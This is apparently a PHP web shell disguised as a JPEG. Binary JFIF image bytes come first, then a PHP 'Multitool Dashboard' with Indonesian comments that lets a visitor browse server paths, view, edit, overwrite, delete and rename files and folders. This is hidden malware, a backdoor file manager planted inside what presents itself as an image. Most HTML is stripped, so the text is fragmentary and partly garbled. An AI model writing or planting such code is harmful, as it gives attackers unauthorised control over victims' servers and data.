JFIF     "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777"A !1AQaq"2B#Rb$3CSrs#!1A"Qaq2 ?dRycjZ5kK[OӐ@zfS(քcаq@?Ɖ^[k۷G$捙Fv)Yώ%9ڬjg@a“mQն< зm-A Z*Uso.&$88\fI=9*GCʇ#qV.K,GQ[ _"j T +ؿ*G˕agWʕ:`\R KǸ:UeCݞCF?'[Xՙd#=umc?:lz-1)B(>GΊ6 \ @ز##6.e0쭎<GzidF%n,>[RGlۙ0K#v]g>T.vJͭ2f^5'~ҙbF#(%[F,Ў/ .ؙX cRqg∅bjvؗSf<1?WR Lp1@;O.yrsQ Nʨ&]xߺ,ҹ@mÎviwLD=BY,atg'#(t3C,^pUN"KhLFۘMcwaIJwq"ʻ9ܟ5댹6v3~c hF"Q_qwkJ9]/"|coZȥuDcSl=1w"Suz:}lX Y`VXwUWxTNrLu9C.UE?\SlO{@XۗuKzWhkyzF<)@?hͅ^F Nr:ZM5FvUAdmJjvWg=BFB.p1:uų5䌟GOk1cj[{ CkZ."c\$ fzGK߱OJXQgFsCu-bV7`sٝBRcD# ĝǀD#>ޚ1&FnYiI\f9&a¥8Pf>TJ(w񨤏vi& BU94-xQ>m`x]90KlB;FܨʒnΛImm Cc<؟[yVjnnY;ĀJZ8#\BU4Zf Multitool

= Multitool Dashboard

"; } else { echo "

File tidak ditemukan.

"; } } // Fungsi untuk mengedit isi file function edit_file($file_path) { if (file_exists($file_path)) { // Jika file ada, ambil kontennya $file_content = file_get_contents($file_path); // Menampilkan form untuk mengedit file echo "
"; } else { echo "

File tidak ditemukan.

"; } } // Fungsi untuk menyimpan perubahan function get_file_manager_list($path) { $files = $dirs = []; $items = @scandir($path); if (!$items) return ['files' => $files, 'dirs' => $dirs]; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $fullPath = $path . DIRECTORY_SEPARATOR . $item; is_dir($fullPath) ? $dirs[] = $fullPath : $files[] = $fullPath; } return ['files' => $files, 'dirs' => $dirs]; } $currentPath = $_GET['path'] ?? $current_dir; ?> Multitool

= Multitool Dashboard

File '{$file}' berhasil dihapus.
"; } else { echo "
Gagal menghapus file.
"; } } if (isset($_POST['delete_folder'])) { $folder = urldecode($_POST['delete_folder']); if (is_dir($folder) && rmdir($folder)) { echo "
Folder '{$folder}' berhasil dihapus.
"; } else { echo "
Gagal menghapus folder. Pastikan kosong.
"; } } // Handle rename if (isset($_POST['rename']) && !empty($_POST['rename_path']) && !empty($_POST['new_name'])) { $old_path = urldecode($_POST['rename_path']); $new_name = basename($_POST['new_name']); $new_path = dirname($old_path) . '/' . $new_name; if (rename($old_path, $new_path)) { echo "
Berhasil diubah menjadi '{$new_name}'
"; } else { echo "
Gagal mengganti nama.
"; } } ?> Perubahan berhasil disimpan!

"; } else { echo "

Gagal menyimpan perubahan.

"; } } ?>
  • =
'; foreach ($malware_results as $file) { echo "
  •  " . htmlspecialchars($file) . "
  • "; } echo ''; } else { echo '
     Tidak ada malware terdeteksi.
    '; } } ?>

    Directories

    Daftar File

      {$basename}
      Lihat Edit
      "; } ?>

    Directories

    Daftar File